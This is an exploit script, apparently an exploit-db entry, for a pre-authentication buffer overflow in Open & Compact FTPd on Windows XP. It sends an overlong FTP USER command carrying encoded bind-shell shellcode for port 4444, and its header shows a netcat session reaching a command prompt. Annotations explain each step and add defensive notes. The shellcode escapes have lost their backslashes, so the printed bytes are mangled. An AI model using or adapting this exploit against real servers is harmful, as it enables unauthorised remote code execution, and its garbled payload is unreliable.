
# Title : Open & Compact FTPd Pre-Authentication Remote Exploit
# Published : 2010-02-12
# Author : Lincoln


################################################################
#Title: Open & Compact FTPd Pre-Authentication Remote Exploit
#
#Written by: Lincoln
#Originally discovered by: loneferret
#Reference:
#http://www.exploit-db.com/exploits/11391
#Tested on: XPSP2
#root@box:~# ./ftpd.py 192.168.139.130
#
#Try connecting to host on port 4444
#
#root@box:~# nc -vn 192.168.139.130 4444
#(UNKNOWN) [192.168.139.130] 4444 (?) open
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
#
#C:\Documents and Settings\crap\Desktop\Release>
#################################################################

import socket,sys
# Target address is the first (and only) command-line argument; there is no
# argument-count check, so running the script with no argument raises
# IndexError here rather than printing a usage line.
host = sys.argv[1]

# Banner left by the tool that produced the payload below (x86 encoder,
# 369-byte output). The header comments above say the payload is expected to
# open a listener on TCP/4444 on the target; nothing in this file verifies
# that outcome.
#[*] x86/shikata_ga_nai succeeded with size 369 (iteration=1)

# Payload bytes, kept exactly as published. Note that what the page shows is
# a series of adjacent string literals joined by implicit concatenation.
sc = ("x31xc9xbdxddx2bx25x18xb1x56xdbxcbxd9x74x24xf4"
"x58x31x68x10x83xe8xfcx03x68x0cx3fxdexd9xf0x36"
"x21x22x01x28xabxc7x30x7axcfx8cx61x4ax9bxc1x89"
"x21xc9xf1x1ax47xc6xf6xabxedx30x38x2bxc0xfcx96"
"xefx43x81xe4x23xa3xb8x26x36xa2xfdx5bxb9xf6x56"
"x17x68xe6xd3x65xb1x07x34xe2x89x7fx31x35x7dx35"
"x38x66x2ex42x72x9ex44x0cxa3x9fx89x4fx9fxd6xa6"
"xbbx6bxe9x6exf2x94xdbx4ex58xabxd3x42xa1xebxd4"
"xbcxd4x07x27x40xeexd3x55x9ex7bxc6xfex55xdbx22"
"xfexbaxbdxa1x0cx76xcaxeex10x89x1fx85x2dx02x9e"
"x4axa4x50x84x4execx03xa5xd7x48xe5xdax08x34x5a"
"x7ex42xd7x8fxf8x09xb0x7cx36xb2x40xebx41xc1x72"
"xb4xf9x4dx3fx3dx27x89x40x14x9fx05xbfx97xdfx0c"
"x04xc3x8fx26xadx6cx44xb7x52xb9xcaxe7xfcx12xaa"
"x57xbdxc2x42xb2x32x3cx72xbdx98x4bxb5x73xf8x1f"
"x51x76xfex8exfdxffx18xdaxedxa9xb3x73xcfx8dx0b"
"xe3x30xe4x27xbcxa6xb0x21x7axc9x40x64x28x66xe8"
"xefxbbx64x2dx11xbcxa1x05x58x84x21xdfx34x46xd0"
"xe0x1cx30x71x72xfbxc1xfcx6fx54x95xa9x5exadx73"
"x47xf8x07x66x9ax9cx60x22x40x5dx6exaax05xd9x54"
"xbcxd3xe2xd0xe8x8bxb4x8ex46x6dx6fx61x31x27xdc"
"x2bxd5xbex2execxa3xbfx7ax9ax4cx71xd3xdbx73xbd"
"xb3xebx0cxa0x23x13xc7x61x53x5ex4axc3xfcx07x1e"
"x56x61xb8xf4x94x9cx3bxfdx64x5bx23x74x61x27xe3"
"x64x1bx38x86x8ax88x39x83x81")

# The oversized USER argument: a short filler pattern repeated 199 times,
# ten single-byte pad values, then the payload. The whole thing is sent as
# the "username" of a single FTP USER command, i.e. before any
# authentication has taken place -- which is what makes this a
# pre-authentication issue. From a defender's point of view the signal is
# simple: a USER argument of several hundred bytes has no legitimate use,
# so an FTP server (or an IDS in front of it) should bound-check the
# argument length, reject the command, and log the source address. The
# root-cause fix belongs in the server (length-checked copy of the USER
# argument); until that is applied, do not expose the service to untrusted
# networks.
buf = "x42x2cx20" * 199 + "x90" * 10 + sc

# Plain TCP session to the FTP control port. The script does not validate
# host, set a timeout, or check the server's replies; a refused connection
# or a closed socket surfaces as an unhandled socket.error.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 21))
# Drain the greeting banner (up to 1024 bytes; the content is discarded).
s.recv(1024)
# One USER command carrying buf as its argument.
s.send("USER " + buf + "rn")
# Read and discard whatever the server answers (if it is still alive).
s.recv(1024)
# Python 2 print statement; the message only repeats the header's
# expectation about port 4444 and does not confirm anything.
print "nTry connecting to host on port 4444n"
s.close()